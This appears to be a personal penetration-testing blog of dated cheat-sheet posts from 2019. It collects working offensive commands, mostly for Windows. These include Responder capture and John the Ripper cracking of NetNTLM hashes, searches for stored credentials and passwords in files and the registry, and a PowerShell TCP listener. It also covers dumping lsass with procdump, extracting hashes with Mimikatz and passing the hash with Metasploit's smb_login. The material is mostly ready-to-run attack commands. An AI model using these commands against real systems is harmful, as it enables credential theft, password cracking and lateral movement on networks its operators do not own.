Thursday, October 31, 2019

Nmap Open Web Ports to CSV

nmap scan web ports (80,443,8080,8443) and output to csv using sed

nmap -T4 --max-rtt-timeout 200ms --initial-rtt-timeout 150ms --min-hostgroup 512 -Pn -p 80,443,8080,8443 10.99.106.0/24 -oG - | egrep -v "^#|Status: Up" | sed -E 's/Host\:\s([^\s]+)\s[(]([^)]*)[)]\s+Ports[:]\s80\/([^/]+)\/.+443\/([^/]+)\/.+8080\/([^/]+)\/.+8443\/([^/]+)\/.*/\1,\2,\3,\4,\5,\6/' | grep open



example:

10.99.106.10,test1.local.com,open,closed,closed,closed
10.99.106.11,,open,open,closed,closed
10.99.106.12,,open,open,closed,closed
10.99.106.76,test2.local.com,closed,open,closed,closed

Tuesday, October 22, 2019

Sample Responder command

responder -I eth0 -r -b

cd /usr/share/responder/logs

john --format=netntlm SMB-NTLMv1-SSP-9.9.9.9.txt --wordlist=/usr/share/wordlists/rockyou.txt

john --format=netntlmv2 SMB-NTLMv2-SSP-8.8.8.8.txt --wordlist=/usr/share/wordlists/rockyou.txt

Friday, October 18, 2019

Print all Mac Address Vendors around you (Arp -a)

# print all mac address vendors around you (using arp table and this great python library https://pypi.org/project/mac-vendor-lookup/ )

import os
from mac_vendor_lookup import MacLookup

myCmd = os.popen("arp -a").read()
print(myCmd)
for line in myCmd.splitlines():
 for item in line.split():
  if "-" in item:
   if "--" not in item:
    try:
     print(item + ": " + MacLookup().lookup(item))
    except:
     print(item + ": not found")

View Stored Credentials and Runas

>cmdkey /list

Currently stored credentials:

....

runas /savecred /user:XXXX "c:\BAD.exe"

Search inside Windows Files for passwords

>findstr /s password c:\*.ps1

Password Searching in Registry

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S

REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S


Get File Shares Exposed "net share"

>net share

Share name   Resource                        Remark

-------------------------------------------------------------------------------
C$           C:\                             Default share
IPC$                                         Remote IPC
print$       C:\WINDOWS\system32\spool\drivers                                             Printer Drivers
ADMIN$       C:\WINDOWS                      Remote Admin

Password Login Settings "net accounts"

>net accounts
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          30
Minimum password length:                              15
Length of password history maintained:                12
Lockout threshold:                                    3
Lockout duration (minutes):                           45
Lockout observation window (minutes):                 45
Computer role:                                        WORKSTATION

Get File Shares Drive Letters wmic logicaldisk

>wmic logicaldisk get caption, description, providername
Caption  Description         ProviderName
C:       Local Fixed Disk
X:       Network Connection  \\server\user\XXX
Y:       Network Connection  \\server\public

Print all environment variables "set"

>set

ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\XXXX\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=PCNAME
ComSpec=C:\WINDOWS\system32\cmd.exe
DriverData=C:\Windows\System32\Drivers\DriverData
FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer
FPS_BROWSER_USER_PROFILE_STRING=Default

Patches Installed wmic qfe

>wmic qfe

Caption                                     CSName       Description      FixComments  HotFixID   InstallDate  InstalledBy          InstalledOn  Name  ServicePackInEffect  Status
http://support.microsoft.com/?kbid=4514366  PCNAME Update                        KB4514366               NT AUTHORITY\SYSTEM  XX/XX/XXXX
http://support.microsoft.com/?kbid=4515855  PCNAME  Update                        KB4515855
http://support.microsoft.com/?kbid=4465065  PCNAME  Update                        KB4465065               NT AUTHORITY\SYSTEM  XX/XX/XXXX
http://support.microsoft.com/?kbid=4470788  PCNAME  Security Update               KB4470788                                    XX/XX/XXXX
http://support.microsoft.com/?kbid=4489907  PCNAME  Security Update               KB4489907                                    XX/XX/XXXX
http://support.microsoft.com/?kbid=4503308  PCNAME  Security Update               KB4503308               NT AUTHORITY\SYSTEM  XX/XX/XXXX

Windows Systeminfo

>systeminfo | findstr /C:"OS Name" /C:"OS Version"

OS Name:                   Microsoft Windows 10
OS Version:                10.0.XXX N/A Build XXXX
BIOS Version:              Dell Inc. 1.XX, XX/XX/XXX

Tuesday, October 15, 2019

Powershell listening on a port

$socket = new-object System.Net.Sockets.TcpListener('0.0.0.0', 1080);
if($socket -eq $null){
exit 1;
}
$socket.start();
$client = $socket.AcceptTcpClient();
$stream = $client.GetStream();
$buffer = new-object System.Byte[] 2048;

try
{
    do
    {
    $read = $null;
    while($stream.DataAvailable -or $read -eq $null) {
    $read = $stream.Read($buffer, 0, 2048);
    if ($read -gt 0) {
                    $data = [System.Text.Encoding]::ASCII.GetString($buffer).Trim(0x00).TrimEnd()
                    $buffer.Clear()
                    if($data -ne $null -and $data .Length -gt 0){
                        Write-Output ("RECEIVED : [{0}]" -f $data)
                        $sendBack = new-object System.Byte[] 2048;
                        $sendBack = [System.Text.Encoding]::UTF8.GetBytes($data)
                        $stream.Write($sendBack, 0, $results.Length)
                        $sendBack.Clear()
                        Write-Output ("SENT BACK: [{0}]" -f $data)
                            }
    }
    }
    } While ($read -gt 0);
}
finally
{
    $fileStream.Close();
    $socket.Stop();
    $client.close();
    $stream.Dispose();
}

Wednesday, October 2, 2019

Lsass Dump Mimikatz Pass the Hash Basics

procdump -ma lsass.exe {path to where you want it dumped}\lsass.dmp

Mimikatz.exe
# sekurlsa::minidump lsass.dmp
# sekurlsa::logonPasswords

Username : {user}
Domain     : {domain}
NTLM       : {NTLM Hash}

use auxillary/scanner/smb/smb_login
set SMBDomain {domain}
set SMBUser {user}
set RHOSTS {ip addr}
set SMBPass aad3b435b51404eeaad3b435b51404ee:{NTLM Hash}
run




good blog

https://blog.ropnop.com/practical-usage-of-ntlm-hashes/

When you can & cannot Pass the Hash

great blog

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

From a pentesting perspective:
  • You CAN perform Pass-The-Hash attacks with NTLM hashes.
  • You CANNOT perform Pass-The-Hash attacks with Net-NTLM hashes.
You get NTLM hashes when dumping the SAM database of any Windows OS, a Domain Controller's NTDS.dit database or from Mimikatz (Fun fact, although you can't get clear-text passwords from Mimikatz on Windows >= 8.1 you can get NTLM hashes from memory). Some tools just give you the NT hash (e.g. Mimikatz) and that's perfectly fine: obviously you can still Pass-The-Hash with just the NT hash.
You get Net-NTLMv1/v2 (a.k.a NTLMv1/v2) hashes when using tools like Responder or Inveigh.